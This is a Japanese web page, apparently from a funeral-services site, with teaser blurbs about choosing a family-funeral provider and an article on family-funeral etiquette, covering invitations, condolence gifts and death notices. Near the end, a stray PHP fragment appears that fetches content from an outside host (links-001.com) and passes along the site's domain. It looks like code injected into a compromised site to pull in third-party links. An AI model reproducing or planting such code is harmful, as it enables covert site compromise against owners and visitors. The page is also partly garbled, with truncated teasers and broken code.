前へ
次へ

じっくりと家族葬の話を進めるなら

もしこれからじっくりと家族葬の話を進めるのであれば、信頼と実績のある業者を選んで担当になってもらった

more

家族葬に関して前向きに考えているなら

今、家族葬をしっかりと実践したいなら、特定の業者にターゲットを絞って、しっかりと面倒を見てもらうこと

more

できるだけレベルの高い業者に家族葬を任せる

もしこれから、特定の家族葬をするために業者に声をかけるなら、どこの業者にするのが得策なのかをしっかり

more

家族葬に呼ぶ時のマナー

家族葬というのは、家族以外は呼んではいけないと考えている人もいるかもしれません。
ですが、故人が生前親しかった人や、お世話になった人へは声をかけても良いのです。
ですが、家族葬の場合はマナーに気をつける必要があります。
まずは、家族葬であることをきちんと伝えておくことが大切です。
なかには、参列経験がなくて戸惑うという人もいるでしょう。
一般的な葬儀と変わらないことを伝えて、香典や供花は辞退するという時には、一緒にその旨を伝えるようにしましょう。
参列してくれる人への配慮をすることがマナーとして、とても大事なことなのです。
ですが、この時には注意が必要なこともあります。
辞退したにもかかわらず、香典や供花を持参する人がいるかもしれません。
この時には、断ることは逆にマナー違反となってしまいます。
その時には、香典を受け取り、金額の3分の1程度の返礼品を贈ることが望ましいです。
そして、声をかけなかった人へのマナーも忘れないようにしましょう。
葬儀が終わった後で声をかけて欲しかったと考える人もいるため、訃報通知は必ず送るようにしましょう。
そして、訃報通知を送るタイミングは葬儀の後にしましょう。
事前に通知しておく方が良いと感じるかもしれませんが、すべて執り行った後の方が相手も気を遣うことはありません。
ですが、例外もあります。
親戚や近隣に住んでいる知人など、身近な人の場合は事前に通知をしないと、なぜ声をかけてくれなかったのかと感じる人もいるかもしれません。
身近な人には、葬儀を行う前に必ず訃報通知を送るように心がけましょう。
その時に、家族葬を行うことと、行うことが故人または家族の意思であることを伝え、辞退することをはっきりと伝えるようにします。
辞退することを伝えることは気まずいと感じるかもしれませんが、相手は参列をした方が良いのか迷ってしまいます。
相手へのマナーとしてもはっきりと伝えることが必要なのです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top